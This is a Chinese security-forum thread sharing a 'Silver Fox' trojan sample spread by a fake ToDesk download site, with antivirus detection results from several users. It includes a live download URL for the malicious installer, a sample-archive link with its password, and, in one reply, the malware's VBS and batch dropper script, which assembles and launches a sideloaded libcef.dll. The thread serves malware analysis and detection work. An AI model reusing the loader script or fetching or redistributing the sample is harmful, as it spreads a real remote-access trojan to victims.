我上次发的那个超毒银狐网站又解析到了一个新银狐 vt首发：11/59

显示全部楼层 · 发表于 2025-7-3 07:31:07

本帖最后由 ulyanov2233 于 2025-7-3 07:44 编辑

这次水平没有上次高了【todesk-link】密码：infected
链接：https://qfile.qq.com/q/lWbs5N1gMU
vt;https://www.virustotal.com/gui/f ... e1d5afc3c?nocache=1微步云首发鉴定为银狐：https://s.threatbook.com/report/ ... d1aa3857d8e1d5afc3c
毒网地址;hxxps://todesk-link.com/download/
实际下载地址变了;hxxps://oss-app-hk.oss-cn-hongkong.aliyuncs.com/object/todesk-link.msi
辛苦大家点点举报钓鱼网站，这个钓鱼网站很狡猾，昨天还把下载链接解析到官方todesk逃避钓鱼网站检测

显示全部楼层 · 发表于 2025-7-3 08:17:39

扫描杀

显示全部楼层 · 发表于 2025-7-3 08:48:56

迈克菲 kill

显示全部楼层 · 发表于 2025-7-3 08:56:48

本帖最后由 ongarabazanade 于 2025-7-3 09:00 编辑

360扫描miss没双击火绒kill

显示全部楼层 · 发表于 2025-7-3 09:23:54

ongarabazanade 发表于 2025-7-3 08:56
360扫描miss没双击火绒kill

火绒又是这个人工鉴定的bat病毒名，看来人工看过了

显示全部楼层 · 发表于 2025-7-3 09:32:31

WD 扫描miss 双击Kill

显示全部楼层 · 发表于 2025-7-3 10:00:22

EIS扫描kill

显示全部楼层 · 发表于 2025-7-3 10:27:17

ulyanov2233 发表于 2025-7-3 09:23
火绒又是这个人工鉴定的bat病毒名，看来人工看过了

感谢楼主提醒，没想到火绒人工鉴定还挺迅速，以后用的就更放心了，希望火绒越来越好用吧。

显示全部楼层 · 发表于 2025-7-3 10:31:03

ulyanov2233 发表于 2025-7-3 09:23
火绒又是这个人工鉴定的bat病毒名，看来人工看过了

这种只能人工鉴定吧。
set ws=wscript.createobject("wscript.shell")
ws.run "C:\ProgramData\cba.bat",0

@echo off
:Z
copy /b C:\ProgramData\a.ini+C:\ProgramData\l.dll C:\ProgramData\libcef.dll"
IF EXIST "C:\ProgramData\libcef.dll" GOTO Y
GOTO Z
:Y
start C:\ProgramData\Agghosts.exe
@ping 127.0.0.1 -n 1 >nul
tasklist|findstr /i "Agghosts.exe" ||goto Z
exit

显示全部楼层 · 发表于 2025-7-3 10:38:44

本帖最后由 inhh1 于 2025-7-3 10:46 编辑

C:\Users\Public\Documents\libcef.dll 是恶意软件 AI:Emotet.45841.3E1C5FA017
C:\Program Files\Windows Defenderi\xfNnRDR83c\libcef.dll 是恶意软件 Trojan.Generic.37916281
怎么释放了两个，报毒名还不一样
以及：BD引擎貌似对这个处理有区别，vt上有bd引擎报出来的，但是bd本家没报出来，杀的衍生，很奇怪

[病毒样本] 我上次发的那个超毒银狐网站又解析到了一个新银狐 vt首发：11/59

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块